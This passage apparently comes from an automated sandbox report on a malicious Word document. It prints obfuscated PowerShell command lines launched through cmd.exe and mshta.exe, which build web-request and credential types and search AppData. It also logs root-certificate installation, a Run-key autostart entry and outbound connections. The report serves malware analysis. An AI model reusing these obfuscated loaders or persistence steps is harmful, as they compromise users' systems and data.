'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe 'C:\WinDoWS\sysTEm32\CMD.EXe' /c 'SeT STI= $iBHrW = [tyPE]('{2}{7}{8}{3}{0}{5}{1}{6}{4}'-f 'ERi','RING,s','COLLE','En','.obJECT','c.DiCtiONARy[st','yStEM','c','tIoNs.g'); .('{0}{1}{2}'-f'S','ET','-iTEM') ('{0}{2}{1}' -f 'VAr','Le:7B1M','iAB') ([tYPe]('{2}{3}{1}{0}' -f'Ock','l','s','crIptb') ) ; $MZS=[tYPE]('{0}{1}'-F 'R','EF') ; ^&('{1}{2}{0}'-f '-iTEM','SE','T') ('{1}{0}{2}'-f'iAbL','vAr','e:04k') ( [tyPe]('{4}{3}{0}{1}{5}{2}'-f '.seRvICEp','o','AnAGeR','.nET','SySTeM','IntM')) ; $Nva1I = [tyPe]('{0}{1}{6}{4}{2}{5}{3}'-F'SY','StE','t.WE','ueST','.ne','BrEQ','m'); .('{2}{0}{1}' -f'E','M','seT-iT') ('V'+'Ar'+'Ia'+'Ble:kmd') ( [tYPe]('{6}{3}{4}{5}{0}{2}{1}'-F'nTIalcA','HE','c','ste','M.n','eT.CRede','sY')) ; $bqvM = [TypE]('{2}{0}{4}{1}{5}{3}'-F'TE','c','syS','ING','m.tExT.en','Od') ;[string[]] ${P`Ath} = .('{2}{3}{0}{1}' -f 'hi','ldItem','Get-','C') -Recurse -LiteralPath '$env:USERPROFILE\\AppData\\Local\\Microsoft' -ErrorAction ('{1}{4}{0}{3}{2}'-f'tlyC','Si	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C 'set KjV= SeT-VarIABlE eiP ( [tYPe]('{7}{5}{1}{11}{0}{3}{2}{6}{8}{4}{10}{9}{12}' -F 'D','tioN','onArY','icti','tE','LlEC','[ST','cO','RinG,SYS','OBJ','M.','S.GenerIC.','eCT') ) ; ${tV`R`32} =[tYpE]('{2}{0}{3}{1}'-F'R','loCK','SC','iPtB') ; ${g`Nf} = [type]('{1}{0}' -F'f','RE') ; Set-iTeM ('vAriaB'+'le:R'+'tHA'+'C5') ( [type]('{7}{6}{5}{3}{2}{1}{8}{0}{4}'-f'N','epOi','Ic','v','aGER','et.sEr','Tem.n','sys','NTma') ); seT qcj ( [tyPe]('{1}{3}{6}{4}{5}{0}{2}' -F'uE','sY','st','sTE','WeB','rEQ','M.Net.') ) ; sET-iTem VAriAblE:eSY ( [tyPE]('{1}{0}{4}{2}{3}' -F'YsTeM.NeT.','S','DEN','TIALCAchE','CRe'));set-iTem VARIaBLe:r4imz ( [type]('{2}{4}{0}{3}{1}'-F 'T.EN','iNg','SysTem.te','cOD','X') ) ;If(${pS`Vers`ionTa`Ble}.'P`SVersION'.'MaJ`OR' -GE 3){${g`PF}= ${G`Nf}.'aSsE`mb`Ly'.('{1}{0}' -f'tTYPe','GE').Invoke(('{6}{1}{0}{3}{2}{4}{7}{5}' -f'na','tem.Ma','nt.Autom','geme','ati','.Utils','Sys','on')).'GETFiE`LD'(('{0}{4}{2}{1}{3}'-f 'c

Persistence and Installation Behavior:

Installs new ROOT certificates

Show sources

Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\certutil.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\System32\schtasks.exe 'C:\Windows\system32\schtasks.exe' /query

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run SilwerlightUpdateCoreRun			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run SilwerlightUpdateCoreRun			Jump to behavior

Hooking and other Techniques for Hiding and Protection:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 131.253.33.213 443	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Network Connect: 188.241.39.220 187
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Network Connect: 204.79.197.213 443	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Stores large binary data to the registry

Show sources

Source: C:\Windows\System32\certutil.exe

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
